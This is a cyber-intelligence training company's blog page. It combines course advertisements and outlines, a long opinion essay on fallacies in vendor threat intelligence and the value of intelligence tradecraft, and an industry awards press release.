  6. All new products (IoT and beyond) must be certified secure before public release. No more figure it out as we go and bolt it on after we have consumers hooked.
  7. All root access / administrative rights for production, critical, supporting, etc., systems and devices are removed and granted only for approved changes and incidents.
  8. All written code and script must be written properly. There is no such thing as secure code, only code the works correctly and does not create vulnerabilities.

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

    9. All operating systems will be shipped closed and installed closed with a risk rating system for each port, protocol, and/or service. Each modification reduces the security posture of the operating system providing a risk score while automatically offering advice on how to remediate that score with other controls. 

    10. New regulations to enforce security and privacy, demanding disclosure of breaches,    fining companies and individuals for negligence are put in place, at once.

    11. Vendors posting adversary IoCs, TTPs, and other methods that would normally be seen as ‘telling the enemy what we know, i.e., sedition’ will be fined for such activity.

  12. You will tell yourselves over and over again that contracting with Treadstone 71 to build your cyber intelligence strategy and program is the absolute right thing to do (repeat after me …).

Merry Cyber Christmas from Treadstone 71

img_0668

Featured post

Clandestine Cyber HUMINT 

CLANDESTINE CYBER HUMINT/OSINT COURSE

Course snippet non-inclusive of Tails, Tor, Dark Net, and Oryon:

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

Find the course information and registration here:

CLANDESTINE CYBER HUMINT/OSINT COURSE

…..

1. Anonymity
2. What is anonymity online?
3. Tails
1. What is Tails?
2. Tails and Tor Bridge Mode
3. Tor Project
1. Overview
2. Who uses Tor?
3. Tor – A Layman’s Guide
4. Tails – Tor enforcement
5. Tails Installation Assistant
6. Install from Windows
7. I2P Anonymous Network
8. Intro I2P

…..

4. Information Warfare and Cyber Psychological Operations
1. Target analysis and message manipulation where applicable
1. Gathered data
2. Organized and decomposed data points
a. Established timelines
b. Created adversary dossiers and organization charts

…..

5. Intro to the Darknet
5.1 Introduction to the Darknet (NOTE: Some/Many of the sites come and go and may not be available for review)
5.1.1 How to Access Onion Sites
5.1.2 Tor – Download, Installation, Use
5.1.3 Markets to Search
5.1.4 Site for Exploration:

 

…..

 

 

 

Featured post

Amsterdam, NL 1/30-2/3/2017 Cyber Intel Training

Registration Information – Treadstone 71 Cyber Intelligence Tradecraft Certification
Dates and Times TBD

https://cybershafarat.com/2016/07/31/intelligenceanalysis/

http://www.planetreg.com/intelAmsterdam to register for the course.

*********************************************************************
Cyber Intelligence Tradecraft Certification
Cyber CounterIntelligence Tradecraft Certification
Cyber Intelligence Analyst Certification

Upcoming Classes

*********************************************************************

 

Featured post

Proposed 2017 Training Dates – US

*********************************************************************

Cyber Intelligence Tradecraft Certification

Cyber CounterIntelligence Tradecraft Certification

Cyber Intelligence Analyst Certification

Upcoming Classes

t71-reflections-observations

Featured post

Fallacies in Threat Intelligence Lead to Fault Lines in Organizational Security Postures

This article is partially written in analytic writing format starting with the conclusions first. The Conclusion section does not include normal analytic paragraphs and alternative analysis following standard intelligence tradecraft analytic writing. Instead, the Recommendations and Opportunities section represents supervisory actions. The article uses the Admiralty System or NATO System as a method for evaluating collected items of intelligence recognized by a letter/number combination found after article citations. The article discusses the issues associated with threat intelligence, the need a common understanding of taxonomy and glossary, as well as presenting a case for intelligence tradecraft as a common standard. Furthermore, the article takes vendors to task for their reporting methods, content, and intent while providing a listing of recommendations and opportunities for organizations that may assist them in their building of organizational intelligence capabilities. The focus is on intelligence as it relates to cyber security / information security in as much as the length of this article allows.

Read the article here as PDF: fallacies-and-fault-lines-treadstone-71

or the slightly updated version here: Stakeholder Brief-Understanding Intelligence

Conclusion

Organizations follow inaccurate definitions of threat intelligence leading to poorly conceived cyber threat intelligence programs. Vendors communicate threat intelligence definitions supporting their offerings propagating the fallacy that threat intelligence solves numerous security problems.

Cyber Threat Intelligence functions being built on a foundation that is not supported by standard intelligence tradecraft. Many programs support a fraction of the intelligence needs, yet stakeholders hold unrealistic expectations based upon expenditures.

Information security capabilities marginally improve as spending skyrockets and security posture improvement is limited to after-the-fact discoveries communicated as prevention.

Continued purchases of ‘threat intelligence’ tools based on the see-detect-and arrest paradigm ensure slow improvement and loss of data expansion. Intelligence program builds focused on technology capabilities repeats the historical problems of information security when firewalls and anti-virus represented the core of security programs.

Recommendations and  opportunities  normally located  in this  report position  follow below   in the Recommendations and Opportunities section.

Upcoming Classes

 

Access to organizations who may be more advanced presents gaps in data available for this article. We based evidence upon direct access to some Fortune 500 organizations, discussions during cyber intelligence training classes, and actual intelligence program build activities.

Common  Taxonomy

A general Internet search on ‘threat intelligence’ returns 11 million results in .36 seconds demonstrating the intentional propagation of a term intended to generate revenue. Information and cyber security vendors, reputable training organizations, and companies use the term so often it has lost any real meaning. Most vendors use the term as if intelligence is easily created, readily available. Products are sold

with the expectation that threat intelligence is the panacea CISOs have sought for years. This is (the expectation) a general misnomer and cyclical in the regular creation and use of buzzwords and catch phrases that change annually. Vendors create years of capabilities based upon the jargon that just yesterday, no one even knew existed. One of those buzzwords is threat intelligence.

What is threat intelligence? Gartner indicates this to be:

Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard. (Gartner, 2013) C3

Solutionary (NTT) uses this definition from the Central Intelligence Agency:

Reduced to its simplest terms, intelligence is knowledge and foreknowledge of the world around us. The prelude to decision and action by U.S. policymakers. Intelligence organizations provide this information in a fashion that helps consumers, either civilian leaders

or military commanders, to consider alternative options and outcomes. The intelligence process involves the painstaking and generally tedious collection of facts, their analysis, quick and clear evaluations, production of intelligence assessments, and their timely dissemination to consumers. Above all, the analytical process must be rigorous, timely, and relevant to

policy needs and concerns. (Security, 2016) A1 NTT Security then goes on to say that instead of providing military or political intelligence to government stakeholders, the current focus within the information security industry is to deliver threat intelligence to an organization’s stakeholders about digital threats to their enterprise systems. (Security, 2016) B2

NOTE: What Is Intelligence? Introduction – Muskingum University. (n.d.). Retrieved from http://intellit.muskingum.edu/whatis_folder/whatisintelintro.html (not cited by NTT)

Data and information need definition as well. Many reports and daily deliverables are termed to be intelligence when they only meet the criteria of data or information.

figure1

Figure 1 Data and Information (University of New England, 2011)

Definitions Misunderstood

Herein lies one of the most basic issues that vex many organizations today, whether understood or not. The myopic view that the missing cog needed to protect an organization is technical threat intelligence. We couple this with additional fallacies a bit later. Fallacies that create massive fault lines in our cyber security postures guaranteed to lead to unrealistic expectations and program gaps.

Definitions for intelligence range in scope and depth based upon who is using the term. We tend to stay close to traditional tradecraft definitions such as those below:

The product resulting from the collection, processing, integration, evaluation, analysis, and   interpretation

figure2.jpg

Figure 2 MWR Model of Threat Intelligence

of available information concerning adversaries (script kiddies, novices, cybercriminals, nation- states, hacktivists, political activities, insiders, whitehat/blackhat hackers, cyber terrorists, competitors, investigative reports, academics) hostile or potentially hostile cyber elements, or areas of actual or potential operations. (Government, Joint Intelligence, 2013) A1 Also, a body of evidence and the conclusions drawn from what is acquired and furnished in response to the known or perceived requirements of consumers. It is often derived from information that is concealed or not intended to be available for use by the acquirer. (Government, 2013) A1 Alternatively, data and information that is sourced openly, and when placed through a process of decomposition, analysis, recomposition, and synthesis, becomes intelligence.

Treadstone 71 Cyber Counterintelligence Tradecraft Certification – http://www.planetreg.com/CounterIntel

It gets quite confusing. Which definition should we follow? For pure terminology, MWR InfoSecurity in the United Kingdom seems to have a solid handle on the threat intelligence definition. MWR proposes a model that breaks down threat intelligence into four distinct categories based on consumption, strategic, operational, tactical, and technical. (InfoSecurity, 2015) B3 MWR’s model (Figure 2) is well defined, detailed, and something organizations should read and recognize.

Strategic, Operational, Tactical, and Technical Intelligence – Defined with Respect to Threats Strategic Intelligence is defined as the high-level information, consumed at board level or by other senior decision-makers and stakeholders at the business leadership level. (InfoSecurity, 2015)

Operational Intelligence is defined as Information about specific imminent attacks against the organization and is initially consumed by higher-level security staff, such as security managers or heads of incident response. Operational Threat Intelligence also includes attacks in progress, day-to-day situational awareness, surveillance and warning while focusing on adversary intentions. (InfoSecurity, 2015)

Tactical Intelligence is defined as the Tactics, Techniques, and Procedures (TTPs) and is information about how threat actors are conducting attacks. (InfoSecurity, 2015)

Technical Intelligence is defined as the Information (or, more often, data) that is normally consumed through technical means. IP addresses, domains, domain information, MD5 sums, log monitoring, technical data feeds from internal and external technologies and providers are included in this listing and are often termed to be Indicators of Compromise (IoCs).

The problem with this model is the exclusive focus on threat intelligence. Threat intelligence is a subset of intelligence. Threat intelligence assumes a certain amount of collected data and the information is collected creating intelligence that is then aligned to organizational threats. Threat intelligence does not always include the correct data. Most all times, the data is tactical and technical in nature leaving significant gaps. Other times that data is skewed by the inherent bias of the technologies through which it is collected and filtered. In the end, it lacks in scope, depth, breadth, including deficient in tradecraft. Other types of intelligence reporting rarely covered in organizations include basic and foundational intelligence, research intelligence, competitive, and estimative intelligence. For more information on types of intelligence, see cia.gov. Traditional warning intelligence is what the information security industry calls threat intelligence.

What is Tradecraft?

Unfortunately, most of what is produced are data and at best, information. This starts with the misunderstanding as to what data is versus information as opposed to actual intelligence. The term is a core component of sales neglecting the difficult process of creating intelligence while presenting data and information as actionable intelligence. Creating intelligence is a process that requires hard-nosed collection, attention to detail in production, structured methods and techniques, awareness of critical thinking and cognitive bias, the use of analytic methods, and the patience and perseverance that comes with knowledge creation. This is called tradecraft.

Let’s not confuse tradecraft as being something that is military intelligence. Many believe intelligence tradecraft is military in form and function. This is not true. The intelligence tradecraft of which I speak is rooted in CIA capabilities honed over years of trial, error, mistakes, and triumphs. The writings of Sherman Kent, long held as the father of intelligence analysis, defined methods of intelligence analysis used today. Kent’s analytic standards, doctrines, and practices need to be applied today within cyber threat intelligence functions. (Davis, 2007) A1 The writings of Richards J. Heuer Jr., a 45 year CIA veteran, describe issues with critical thinking, cognitive bias, and structured analytic techniques used today as well. The writings of both men are directly applicable to information security efforts to create threat intelligence. Their use enables organizations to see beyond the limited view of ‘see, detect, and arrest’ while progressing to data collection, analysis, and intelligence creation use to prevent and eventually predict adversary actions. Also, tradecraft is the underlying framework for intelligence upon which military and non-military programs should be built.

Build your Intelligence Program – Interim Services or Program Build – Interim Service Lead – Program Build

Many of the fallacies we face as cyber security professionals relate to a lack of understanding of what it takes to be an intelligence professional. The two are not mutually inclusive. Security operation centers are not populated with intelligence professionals. They are not occupied by analysts skilled in the arts professed by Sherman Kent and documented by Richards Heuer. In fact, most cybersecurity professionals find tradecraft to be distasteful and a general waste of time. This conclusion is drawn from the many engagements across the globe with cyber security professionals. When we come onsite to help build the intelligence program, we immediately face resistance if the focus is not on low-level, technical activities. Most do not have a grasp, respectfully, surrounding the need for a well-built intelligence program that is top-down as opposed to technically oriented, bottom-up. Most have not had training in intelligence analysis or tradecraft.  Real world intelligence  analysts endure rigor,  structure, focused training that specializes in the craft of intelligence analysis. The core function of any intelligence organization. They learn how to think, write, and brief. They study analytic tools, counterintelligence issues, denial and deception, analysis, and warning skills. (Agency, 2007) A1

Another fallacy is that former military intelligence soldiers and National Security Agency staff are skilled in tradecraft. Not to say that they are not capable or that they have not had intelligence courses but the courses are largely focused on physical, military action. Their version of tradecraft is specific to their missions and requirements. The NSA trains collectors to collect and analysts to analyze and most times; never the twain shall meet. We have direct knowledge of these methods. The protocol is compartmentalization and separation of duties as a higher priority over continuity of effort and understanding. The intent here is to point out that their skills are very focused on many different areas associated with intelligence. Whether the type is signals based or human, the methods do not include the end-to-end scope of traditional intelligence tradecraft. What we have found is their adoption to be much faster, their understanding of the model more inclusive than cyber security professionals. In general, the ability to adapt, adopt, and incorporate the tradecraft model is not a stretch for these men and women due to their backgrounds.

The Daily Crises

We spend countless hours preparing daily reports, responding to daily incidents, and dealing with the issue de jour. Morning standup meetings are preceded by a daily data push many call intelligence. We establish serialized reporting where each day we deliver a threat report; each week a weekly threat rollup; each month a roll-up of each week and so on. We spend so much time gathering current data and fighting daily issues we never get to a point where we can perform intelligence-type work. This is largely self- inflicted. This fallacy in our process ensures we will never have the ability to analyze data based on the historical collection. The collected data is all current. The scope for that data is immediate. The data is not arranged in such a way as to facilitate long-term analysis. Of course, there needs to be a balance between the long-term analysis and the short-term reporting. The fallacy is that the short-term reporting is communicated as intelligence analysis product when it is mostly a regurgitation of open source data and readily available vendor reports.

Letting the Enemy Know What We  Know

Vendor reports with cute names dot the landscape documenting the tactics, techniques, and procedures (TTPs) of adversaries. Detailed lists of adversary IoCs populate the appendices of said reports. The reports list the capabilities of the vendors verifying their prowess at uncovering adversaries. Adversary mistakes are lauded with great swagger. The reports list many conclusions without citation, with little discussion of likelihoods, limited communication of confidence levels, and no discussion of gaps in their collection, production, or analysis. The reader is left to trust the report at face value. The reports positioned as absolute in their reasoning, yet the logic may be poorly crafted. Sweeping conclusions that oversimplify the problem hallmark the reports. Blanket statements used to persuade the reader repeated in the reports to serve to hammer home the need to purchase services from these vendors.

Written to market and sell products and services, the reports do not discuss the potential for denial and deception. Could the data be forged or faked before vendor acquisition? Is it possible their collection methods or sensors are in error or misinterpreted? How did the vendor determine source credibility and reliability?  Is there any bias in the technology used or human analysis of the data collected?  Are adversaries using heuristics to lull vendors into comfort levels of consistency all the while they are deceiving vendors with traditional maskirovka, the well-honed Russian use of deception? The belief is yes; our vendors are being lulled into comfort levels. As we clearly communicate what we know about them, our adversaries adopt new methods to deny and deceive us all the while they continue to project activities that reflect old TTPs. On the contrary, deception existed as far back as recorded time. The Trojan horse, double agents, and tactical deception is a strategy that turns the tide of battles. (Hames, 2014) A1

The practice of deception to trigger an action is a key method of generating data that can be turned to intelligence. Triggering an action leads to the collection of data not only from the first ripple in the so- called pond but from second and third order effects. An old USAF tactic is to circle with fighter jets near the 12-mile limit of a countries ocean border. The jets circle and circle while an RC-135 is nearby collecting data. Eventually, one or both of the jets turns on the afterburners crossing the border. Acquisition radars turn on, missile sites light up, all the while the RC-135 is collecting data. A treasure-trove of information is collected as radio chatter fills the airwaves. The jets turn back and the collection slowly subsides. The intent clear. The data collected, great. Our adversaries use the same tactics in the cyber environment to determine our readiness posture, technical capabilities and methods for defense.

Is This Sedition?

The real travesty with the vendor threat reports is the fact that they are openly published. Cyber warfare is upon us. Adversaries and enemies scour blogs, forums, chat rooms and personal websites to piece together  information that is used to harm the government, commercial organizations,  and individuals.

They utilize methods of espionage extracting sensitive data at unprecedented rates. When discovered, cyber security vendors feel a need to publish every TTP, each IoC, and their malware and individual hacker courses of action to the world. The damage done by these actions is pure negligence. Very surprising that the government does not ask the vendors to suppress the details. If one of their own were to release such data, we would be reading reports for charges of treason. The reports serve to bolster vendor sales while informing the enemy what we know about them and their TTPs. Many of these reports  reference other vendor reports on the same topic providing

figure3

Figure 3 Admiralty Code – Hansen

circular reasoning that further, albeit falsely, solidifies their conclusions (demonstrated clearly in the reports on Rocket Kitten). This behavior serves to drive the enemy to increasingly creative and undetectable methods of scanning, penetration, and data exfiltration. They change these methods more frequently in light of the constant barrage of vendor reports; many timed just before or during well-known cyber security conferences. The organizations who have penetrated the enemy and adversary forums, chat rooms, and new methods of communication while using the access to learn more about them, may miss the ‘frequency change’ due to the vendor reports. By frequency change I refer to the old methods of rolling up on a radio frequency, learning about the enemy including alternative frequencies, and making the change to that frequency when the request is broadcast. Today the methods are much more dynamic, the communications many times encrypted, and the changes very subtle.

Fallacies that Create Fault  Lines

As discussed above, we believe the fallacies in threat intelligence stem from a lack of agreed upon glossary and taxonomy. Also, the industries acceptance of vendor solutions to provide actual intelligence, and vendor reports taken at face value without source validation or citation. The organizational placement of intelligence within information security, many times incident response as well as the incorrect understanding of what an intelligence professional is, and the inability of organizations to see beyond purely defensive measures for information security all contribute to the issue. These fallacies understood to be non-inclusive, create natural fault lines in our security programs.

Recommendations  and Opportunities

Changing Behaviors

What can we do to rectify the path of fallacies we continually choose to follow?

First (in no specific prioritized order) we must educate everyone in information technology, information security, and the C-Suite on the standard taxonomy of intelligence. This provides a shared understanding and baseline glossary upon which to build communication.

Secondly, we must treat each vendor report as nothing more than another source of data. Data that must be evaluated for credibility, reliability, and relevance. To do so, we can use the NATO Admiralty Code (Figure 3). (Hanson, 2015) A1 used throughout this article to rate sources in the format of (A1, B2, B3, etc.). The code helps organizations evaluate sources of data and the credibility of the information provided by that source. Evaluate each vendor report using this coding method while documenting ease of data extraction, relevance to your organizational issues, type of intelligence (strategic, operational, tactical, and technical), and value in solving your security problems.

Thirdly, begin to grow and expand your intelligence program functions. Learning methods of anonymity, open source data collection, collection management and planning, production management of intelligence functions, analysis, and analytic writing and dissemination adds immediate value to your organization. Understand that intelligence is not the same as incident response or a core component of the security operations center. These skills are unique and must be shared but to bury them within these areas is a mistake. We faced this for years (and still do) putting information security under information technology treating it as a solely technical issue. We should not make the same mistake with intelligence. Intelligence functions need direct access to organizational stakeholders.

figure4

Figure 4 Intelligence Analysis Format – SAMPLE

Fourth, create standard processes to seek out malicious actions within your information technology environment. Use adversary TTPs to drive your ‘hunt and detect’ but understand that albeit a valuable capability, is not a proactive function. They are already inside the wire and must be removed. Organizations need to do this for proper hygiene.

Treadstone 71 Reporting and Briefs

Fifth, develop methods within your organizational risk model to collect open source data regularly. Like our third point above, we must grow this function so we collection data and information, and develop intelligence that is pertinent to our stakeholders and our organization. Capture priority intelligence requirements, create information requirements prioritized and vetted focusing on all sources of data including open source collection. Devise methods for mission management that drive targeting for passive collection.

Make note that many vendor report subscriptions provide generalized and generic data and information. Periodically, intelligence is part of the report. Occasionally, something relevant to your organization is included. Most time the reports are of a ‘create once, distribute many format.’

To drive industry change, work with vendors. Request and require source credibility ratings, citations with confidence levels, explanations of analytic methods, and resumes of staff working your contracts.

What are confidence levels?

Confidence levels relate to evidence helping intelligence staff state not just how confident they are as analysts but why they are confident. (Katherine Hibbs Pherson, 2012) This helps intelligence functions define why they believe something (the because) at what level based upon high, moderate, and low as defined below in Figure 5.

figure5.png

Figure 5 National Intelligence Council Confidence Levels

Sixth, create a model of your adversaries and their capabilities that are target centric. Expand your collection to include all areas concerning your adversary. The only way to fully understand what threatens your organization is to fully understand the enemy, their motivations, their competence, and their skills. Otherwise, organizations will continue to play a basketball game on defense, never crossing the half-court line. A recipe for assured loss.

Seventh, write in intelligence analysis format. Stakeholders have little time. Making them hunt for the answers ensures failure. Use the guide in Figure 4 above to assist in your writing, Intelligence Analysis Format.

Eighth, create a strategic plan followed by a program plan for intelligence in your organization. Define what it is and is not. Author a vision and mission along with guiding principles. Develop a series of goals with three to four objectives each determining how to achieve those goals. Gain acceptance and follow the plans.

Ninth, set up a listening tour of your lines of business and corporate stakeholders. Gain permission to attend their meetings with the understanding that you are there to listen and learn. Do not offer your services. Listen to digest and gain knowledge of your stakeholders. Do not listen to prepare a response. Gather this information and take it back to your organization to help your program move forward. You may believe you know your company but knowing your professor ensures an ‘A.’

Tenth, give your organization time to implement an intelligence function. Determine what makes sense for your organization as to what that timeframe is. Institutionalize lesson-learning as process of performance improvement, not assessing blame. (Gabbard, 2008) B1 Give your intelligence organization time to learn. Making mistakes in the early stages of maturity is expected. Just do not make the same mistakes repeatedly. Give your intelligence organization the authority to make decisions and the access to stakeholders to learn requirements and communicate capabilities. Establish goals and objectives that are reachable and practical. Stretch goals when first building a function can lead to unnecessary failures. Leadership and the right level of leadership are required to manage analysts. Find the right level for your organization. When you add an intelligence function to an organization that has never had one, manage expectations. Eventually, a properly staffed, trained, and led group can deliver significant value to the organization.

Lastly, although non-inclusively, prepare your organization for the next steps. Those next steps involve counterintelligence. Although now seen as a high-risk area for organizations, my belief is that we will eventually adopt certain principles associated with this tradecraft. In fact, several organizations already employ methods associated with counterintelligence, both passive and active. In 2011, we adapted the Ten Commandments of Counterintelligence into a list focused on cyber. They are:

  1. Be offensive
    1. Do not be afraid to anonymously collect information on your adversaries. In many cases, they are hiding in plain sight. You just need to know where to look.
    2. Cyber intelligence is the basis for cyber counterintelligence. Learning your adversary prepares an organization for counter denial and counter-deception.
  2. Honor your profession
    1. Learn about intelligence analysis. Leave your security comfort zone
    2. Take classes in critical thinking. It is never too late.
  3. Own the street
    1. Establish a presence on the same sites of your of your adversaries
    2. Create multiple personas when doing so.
  4. Know your history
    1. The adage of ‘know your history or be destined to repeat it’ is in effect.
    2. Know what your adversaries have done to determine what they may do.
  5. Do not ignore analysis
    1. Analysis is not grown from a server but resides in human skill.
    2. Until artificial intelligence is with us, the human mind serves as the best solution for intelligence analysis (if properly trained).
  6. Do not be parochial
    1. Share data even if you must do this via back channels. We do not advocate breaking corporate rules by sharing sensitive data.
    2. Quid pro quo sharing is required.
  7. Train your people
    1. Understand your needs, understand the timing of those needs, and drive for increased training budgets.
    2. The best investment you can make is in yourself.
  8. Do not be shoved aside
    1. Gently push your way into business meetings establishing a ‘listening tour’
    2. Clarify what intelligence is and is not.
  9. Do not stay too long
  1. Fully document your actions while periodically shifting targeting assignments to stay fresh.
  2. Rotate assignments to learn every facet of the intelligence game.
  1. Never give up (Bardin, 2011) B2
    1. Perseverance and patience are required.
    2. Our adversaries do not operate under the same rules of engagement that hampers our actions.

One last item we must avoid is where we are placing intelligence in our organizations. We are repeating history with the mistake of placing Intel in the SOC or as part of incident response. This is akin to putting infosec under IT operations buried within the CIO’s organization. Intelligence is not a technical issue any more than security. If we continue down the path, we will create more faultlines.

figure6.png

Much like information security a short 15 years ago, cyber intelligence is in its infancy and largely misunderstood. We are rife with fallacies, inaccurate definitions, and terminology usage. The profession of intelligence should not be confused with security and should not be clouded by poor and biased reporting. The only way to change the problems inherent in intelligence today is to drive that change internally while forcing the market to shift. The CIA realized this years ago striving to create the ‘profession of intelligence analysis.’ The framework of intelligence can and should be the underlying standard for intelligence planning and program builds.

This comes with frequent constructive criticism of vendor delivered products and services. I have always said the best investment you can make in life is in yourself. Organizations should consider doing the same. Educate your staff. Plan your program. Drive the change from the inside.

For a summary of this article, see the conclusion at the beginning. Jeff Bardin

Treadstone 71©

Citations

Agency, C. I. (2007, April 25). Offices of the CIA. Retrieved from Central Intelligence Agency – Training Resources:    https://www.cia.gov/offices-of-cia/intelligence-analysis/training-resources.html

Bardin, J. (2011). The Ten Commandments of Cyber Counterintelligence. Boston: CSO Online.

Davis, J. (2007, April 21). Sherman Kent and the Profession of Intelligence Analysis. Retrieved from CIA Library:   https://www.cia.gov/library/kent-center-occasional-papers/vol1no5.htm

Gabbard, T. a. (2008). Assessing the Tradecraft of Intelligence Analysis. Retrieved from Rand Corporation Published Research: https://www.rand.org/content/dam/rand/pubs/technical_reports/2008/RAND_TR293.pdf

Gartner. (2013, May 13). Threat Intelligence. Retrieved from Gartner Definition: Threat Intelligence: https://www.gartner.com/doc/2487216/definition-threat-intelligence

Government, U. (2013, October 22). Joint Intelligence. Retrieved from http://www.dtic.mil/doctrine/new_pubs/jp2_0.pdf

Government, U. (2013, February 21). Office of the Director National Intelligence. Retrieved from www.dni.gov

Hames, J. (2014, September). Strategic Trickery: The U.S. Army’s Use of Tactical Deception. Retrieved from Soldiers – The Official U.S. Army Magazine: http://soldiers.dodlive.mil/2014/09/strategic- trickery-the-u-s-armys-use-of-tactical-deception/

Hanson, J. (2015). The Admiralty Code – A Cognitive Tool for Self-Directed Learning. Sydney: JM  Hanson.

Retrieved from www.ijlter.org/index.php/ijlter/article/download/494/234

InfoSecurity, M. (2015). Threat Intelligence: Collecting, Analysing, Evaluating. London: MWR InfoSecurity. Retrieved from https://www.mwrinfosecurity.com/assets/Whitepapers/Threat- Intelligence-Whitepaper.pdf

Katherine Hibbs Pherson, R. H. (2012). Critical Thinking for Strategic Intelligence. Thousand Oaks: CQ Press.

Security, N. (2016, September 9). Threat Intelligence Defined – 1260wp. Retrieved from Threat Intelligence Defined – Solutionary: https://www.solutionary.com/_assets/pdf/white- papers/threat-intelligence-defined-1260wp.pdf

University of New England. (2011, June 29). Cognitive Psychology – Data, Information, and Knowledge – Lecture Notes. Retrieved from University of New England Mathematics, Statistics and Computer Science: http://turing.une.edu.au/~comp292/Lectures/HEADER_KM_2004_LEC_NOTES/node4.html

 

img_0668

 

Featured post

INSA Opens Nominations for 2017 Achievement Awards

FOR IMMEDIATE RELEASE

Contact: Ryan Pretzer
(703) 224-4672
rpretzer@insaonline.org

Nominations sought from the IC, private sector, and academia for national security professionals exhibiting great promise

Nominations due Monday, October 31, 2016; six recipients to be recognized in winter 2017 ceremony

ARLINGTON, VA (August 29, 2016) – Members of the intelligence and national security communities are encouraged to nominate their peers and partners from government, private industry, and academia for the 2017 Achievement Awards, the Intelligence and National Security Alliance (INSA) has announced. The Achievement Awards recognize up-and-coming leaders and mentors serving or supporting the U.S. national security mission. The six awards and eligibility criteria are as follows:

  • Joan A. Dempsey Mentorship Award – Nominees would come from public, private and academic elements up to and including GS-15/0-6 and equivalent rank.  
  • Sidney D. Drell Academic Award – Nominees would include graduate students and untenured professors.
  • Richard J. Kerr Government Award – Nominees would be civilian government employees up to and including GS-13 and equivalent rank.
  • William O. Studeman Military Award – Nominees would be uniformed military personnel up to and including 0-3/E-6.
  • Edwin H. Land Industry Award – Nominees would include contractors and nongovernment employees with 8-10 years of non executive experience.
  • John W. Warner Homeland Security Award – Nominees would include law enforcement personnel, intelligence analysts and first responders from the federal government and state, local, tribal and territorial (SLTT) partners.

The Achievement Awards program has recognized employees from the Defense Intelligence Agency, Drug Enforcement Administration, FBI, National Nuclear Security Administration, National Security Agency, Northrop Grumman, Oak Ridge National Laboratory, Office of Naval Intelligence, U.S. Coast Guard, U.S. Secret Service, and Vencore, among other organizations in recent years.

INSA Chairman Tish Long said, “INSA is very proud to again host the Achievement Awards. This program represents something we as a community must embrace: recognizing and investing in the amazing young professionals who will be responsible for protecting our nation in the future and are contributing to that mission today. I urge all leaders in our intelligence and national security communities to submit nominations on behalf of the rising stars in their organizations.”

The INSA Board of Directors established the Achievement Awards in 2010 to recognize the accomplishments of entry- and mid-level professionals and mentors working in intelligence and national security. The six awards are each named after a recipient of the William Oliver Baker Award.

Both online and printable versions of the nomination form are available at www.insaonline.org/Achievement. Instructions to submit nominees who would require a classified nomination are available by contacting INSA at achievement@insaonline.org.

Nominations for all awards will be accepted through Friday, October 31, 2016. Recipients will be acknowledged at the 2017 Achievement Awards reception, more details about the reception will be released at a later date.

###

About INSA
The Intelligence and National Security Alliance (INSA) is the premier intelligence and national security organization that brings together the public, private and academic sectors to collaborate on the most challenging policy issues and solutions. As a nonprofit, nonpartisan, public-private organization, INSA’s ultimate goal is to promote and recognize the highest standards within the national security and intelligence communities. INSA has 160 corporate members and several hundred individual members who are leaders and senior executives throughout government, the private sector and academia.

Featured post

Join us at the 2016 ISSA International Conference!

Survival Strategies in a Cyber World
November 2-3, 2016
Hyatt Regency Dallas
Dallas, TX, USA
#ISSAConf

Building a Mature Cyber Intelligence Program 11/2/2016, 4:00 pm – 4:45 pm, Cumberland I/J

http://www.issa.org/?issaconf_home

Senior Many organizations claim to be creating intelligence for their corporate stakeholders. Most believe technology solutions provide the same. Tools, techniques, and protocols / procedures of adversaries is nothing more than data and information unless properly collected, produced, organized, analyzed and disseminated. This discussion covers how to establish the proper strategy using proven intelligence tradecraft methods. We will cover areas of vision, mission, goals and initiative. The discussion guides the attendees through the process of development methods of collection, outlines areas for producing intelligence using structured analytic techniques while extracting the required issues from leadership for focused delivery. Jeff Bardin: Chief Intelligence Officer, Treadstone 71. @treadstone71llc

https://c.ymcdn.com/sites/www.issa.org/resource/resmgr/2016_International_Conference/Detailed_Agenda_2016.pdf

Featured post

Treadstone 71 Cyber Intelligence and Counterintelligence – Course Overviews and Dates

The below information provide non-inclusive overviews of Treadstone 71 Courses.  The courses are listed in order of suggested training. Courses may be taken separately or as a package. Course requests and modifications acceptable. Courses are based upon intelligence and intelligence analysis tradecraft.

Upcoming Classes

SIGN UP – Next class November 29-December 2 in the DC METRO area for the Cyber CounterIntelligence Tradecraft Course – http://www.planetreg.com/CounterIntel

For more information: osint@treadstone71.com or 888.714.0071

Cyber Intelligence Tradecraft Certification

This course is highly specialized following intelligence community tradecraft. If you want purely technical, then this is not the course for you. If you want tradecraft that lays the foundation for a solid program, education that creates a lasting impact, then this is the course for you.

Your enemies scour blogs, forums, chat rooms and personal websites to piece together information that used to harm the government and commercial organizations. Learning about cyber intelligence, OSINT and Cyber-OPSEC effectively equips students with the tools to gather data points, transform these data points into actionable intelligence that prevents target attacks.

The course includes:

CYBINT1 – Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT, TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy – (Case Study 1)

CYBINT2 – Organization, Production, and Structured Analytic Techniques, Use of Techniques, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates – (Case Study 2)

CYBINT3 – Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypothesis, Flow into Hunt, Detect, CSIRT, TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience.

CYBINT4 – Table Top Exercises (TTXs), Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Cyber and Threat Intelligence Program Strategic Plan, Goals, Objectives. Case Study Presentations

Lecture, Hands-on, Apprenticeship, in class exercises, student presentations, analytic products, templates, course material—40 CPEs (5-days – 40 hours)

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

Cyber Counterintelligence

